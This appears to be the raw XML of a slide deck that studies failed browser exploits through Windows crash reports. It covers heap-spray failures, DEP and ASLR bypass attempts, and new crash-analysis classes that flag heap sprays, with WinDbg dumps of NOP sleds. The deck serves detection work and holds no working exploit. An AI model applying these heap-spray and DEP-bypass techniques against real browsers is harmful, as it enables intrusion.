            <a:off x="2057400" y="32058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Curved Right Arrow 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2057400" y="29010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Curved Right Arrow 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2057400" y="2596277"/>
            <a:ext cx="228600" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="curvedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 9833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itle 1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Return to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to turn off DEP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0" y="4724401"/>
            <a:ext cx="4876800" cy="58477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0:012&gt; u 0138fd44 l1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/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0138fd44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ebee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     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</a:rPr>
              <a:t>     0138fd34</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15281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exploits fail?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see exploitation attempts using Watson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09600"/>
            <a:ext cx="435846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2209800" y="2362200"/>
            <a:ext cx="1981200" cy="12954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1002" y="1364474"/>
            <a:ext cx="5183399" cy="518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657600"/>
            <a:ext cx="6324600" cy="647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828801"/>
            <a:ext cx="8991600" cy="98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676400" y="1143001"/>
            <a:ext cx="73309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Hard coded Addresses – ASLR!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2743201"/>
            <a:ext cx="55580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Doesn’t work with DEP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it fail?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4343401"/>
            <a:ext cx="69277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Tested on only one Language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5105400"/>
            <a:ext cx="7739270" cy="609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1524000" y="5867401"/>
            <a:ext cx="8991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32bit exploit against 64bit Windows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27093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1"/>
            <a:ext cx="4800600" cy="5014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75% of IE exploits use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>heapspray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1" y="2057400"/>
            <a:ext cx="5971335" cy="466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143000"/>
            <a:ext cx="4572000" cy="5331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72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/>
          <a:srcRect r="17842"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1836822" y="6051885"/>
            <a:ext cx="433537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981200" y="0"/>
            <a:ext cx="7543800" cy="14176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/>
              <a:t>Data Execute Protection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1371601"/>
            <a:ext cx="441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itchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0:010&gt; .exr -1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ExceptionAddress: 0a0a0a0a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   ExceptionCode: c0000005 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(SOFTWARE_NX_FAULT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   Access violation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  ExceptionFlags: 00000001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NumberParameters: 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   Parameter[0]: 00000008</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pt-BR" sz="1600" dirty="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0:010&gt; u 0a0a0a0a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0a0a0a0a 90              nop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0a0a0a0b 90              nop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0a0a0a0c 90              nop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0a0a0a0d 90              nop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0a0a0a0e 90              nop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0a0a0a0f 90              nop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0a0a0a10 90              nop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0a0a0a11 90              nop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95600" y="1447800"/>
            <a:ext cx="3048000" cy="304800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286" y="1524000"/>
            <a:ext cx="8273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05200"/>
            <a:ext cx="990600" cy="838200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3048000" y="4038600"/>
            <a:ext cx="9906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Vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> code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2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242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242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242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242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576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576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6576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576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910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910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910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910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44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7244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244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244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244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8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578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578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2578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2578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7" name="Title 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1066800"/>
            <a:ext cx="43434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910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6" name="Explosion 1 105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="38862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1" y="1828800"/>
            <a:ext cx="2830479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15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9.46102E-7 C -0.00574 -0.1152 -0.01147 -0.23017 0.00676 -0.26278 C 0.02499 -0.2954 0.06718 -0.24543 0.10954 -0.19547 " pathEditMode="relative" ptsTypes="a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6" grpId="0" animBg="1"/>
      <p:bldP spid="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/>
          <a:srcRect r="17842"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1836822" y="6051885"/>
            <a:ext cx="433537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981200" y="0"/>
            <a:ext cx="7543800" cy="14176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/>
              <a:t>Poor Spray Timing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1371601"/>
            <a:ext cx="419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itchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ExceptionCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: c0000005 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(Access violation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ExceptionFlags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: 00000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NumberParameters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   Parameter[0]: 00000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   Parameter[1]: 05050539</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Attempt to read from address 05050539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Memory not occupied by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> yet: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0:005&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 05050505</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>05050505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05050515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05050525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05050535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05050545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05050555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05050565  ???????? ???????? ???????? ????????</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>05050575  ???????? ???????? ???????? ????????</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Consolas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95600" y="1447800"/>
            <a:ext cx="3048000" cy="304800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286" y="1524000"/>
            <a:ext cx="8273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05200"/>
            <a:ext cx="990600" cy="838200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3048000" y="4038600"/>
            <a:ext cx="9906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Vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> code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2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242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242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242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242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576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576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576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910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910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910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44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7244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244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244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8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578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2578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6" name="Explosion 1 105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="38862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32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1066800"/>
            <a:ext cx="43434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34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1" y="1828800"/>
            <a:ext cx="2830479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90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9.46102E-7 C -0.00574 -0.1152 -0.01147 -0.23017 0.00676 -0.26278 C 0.02499 -0.2954 0.06718 -0.24543 0.10954 -0.19547 " pathEditMode="relative" ptsTypes="a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6" grpId="0" animBg="1"/>
      <p:bldP spid="10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295400"/>
            <a:ext cx="43434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/>
          <a:srcRect r="17842"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1836822" y="6051885"/>
            <a:ext cx="433537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1981200" y="0"/>
            <a:ext cx="8001000" cy="1417638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/>
              <a:t>Spray Memory Already Occupied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1371601"/>
            <a:ext cx="6248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itchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ExceptionAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: 0a0a0a0a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ExceptionCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: c0000096 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  (STATUS_PRIVILEGED_INSTRUCTION)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 err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ExceptionCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: c000001d </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(Illegal instruction)</a:t>
            </a:r>
          </a:p>
          <a:p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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ExceptionFlags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: 00000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NumberParameters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0:000&gt; u 0a0a0a0a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0a0a0a0a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sti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0a0a0a0b ff              ???</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0a0a0a0c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sti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0a0a0a0d ff              ???</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0a0a0a0e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cld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0a0a0a0f ff              ???</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0a0a0a10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cld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0a0a0a11 ff              ???</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0:000&gt; dc 0a0a0a0a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0a0a0a0a  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fffbfffb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fffcfffc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ffdbfffb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ffdbffdb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0a0a0a1a  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ffdbffdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> f7baffdb ffbaf7ba </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ffbaffba</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0a0a0a2a  ff7aff9a ff7aff7a ff5aff7a ff19ff39 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0a0a0a3a  fef8fef9 f6b8fed8 f677f697 ee57ee57</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0a0a0a4a  f698f677 fed9feb8 fed9fed9 fef9fed9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0a0a0a5a  fef9fef9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fef9fef9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ff19ff19 ff39ff39</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0a0a0a6a  ff39ff39 fef9ff19 fef9fef9 fed8fed8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0a0a0a7a  f698f6b8 f657f697 edf6f636 edd5edd5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895600" y="1447800"/>
            <a:ext cx="3048000" cy="3048000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286" y="1524000"/>
            <a:ext cx="82731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05200"/>
            <a:ext cx="990600" cy="838200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3048000" y="4038600"/>
            <a:ext cx="990600" cy="304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Vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> code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2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242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242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242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242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576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6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57600" y="25146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657600" y="29718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57600" y="34290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910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910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191000" y="25146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44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7244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800" y="16002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57800" y="2057400"/>
            <a:ext cx="4572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0101 0101</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Explosion 1 105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="3886200"/>
            <a:ext cx="228600" cy="2286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32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1066800"/>
            <a:ext cx="43434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91000" y="29718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24400" y="25146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24400" y="29718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57800" y="25146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57800" y="29718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91000" y="34290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34290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57800" y="3429000"/>
            <a:ext cx="457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DATADATA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38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1" y="1828800"/>
            <a:ext cx="2830479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420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9.46102E-7 C -0.00574 -0.1152 -0.01147 -0.23017 0.00676 -0.26278 C 0.02499 -0.2954 0.06718 -0.24543 0.10954 -0.19547 " pathEditMode="relative" ptsTypes="a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6" grpId="0" animBg="1"/>
      <p:bldP spid="10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!analyze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0"/>
            <a:ext cx="95250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New Problem Class IDs:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Heapspray</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>STACK_OVERFLOW_EXH_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FILL_PATTERN_0a0a0a0a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Crashed on a CALL instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>BAD_INSTRUCTION_PTR_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CALL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Crashed parsing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FILL_PATTERN_0a0a0a0a_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WITH_SCRIPT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Crashed parsing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with a spray pattern</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>STACK_OVERFLOW_EXH_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WITH_SCRIPT_CODE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16545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600200" y="3886200"/>
            <a:ext cx="8915400" cy="2895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1" descr="XP icon user accou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449" y="4011811"/>
            <a:ext cx="390723" cy="32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1" y="1524001"/>
            <a:ext cx="212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Watson Servers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76401" y="4850011"/>
            <a:ext cx="365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Victim PC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Agent built into Windows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Victim sends crash report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43800" y="1371600"/>
            <a:ext cx="838200" cy="990600"/>
            <a:chOff x="4857" y="1445"/>
            <a:chExt cx="756" cy="864"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19" name="Picture 19" descr="Serv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7" y="1445"/>
              <a:ext cx="454" cy="670"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic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079" y="1639"/>
              <a:ext cx="534" cy="670"/>
              <a:chOff x="4888" y="1437"/>
              <a:chExt cx="534" cy="670"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="21" name="Picture 21" descr="Serv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88" y="1437"/>
                <a:ext cx="454" cy="670"/>
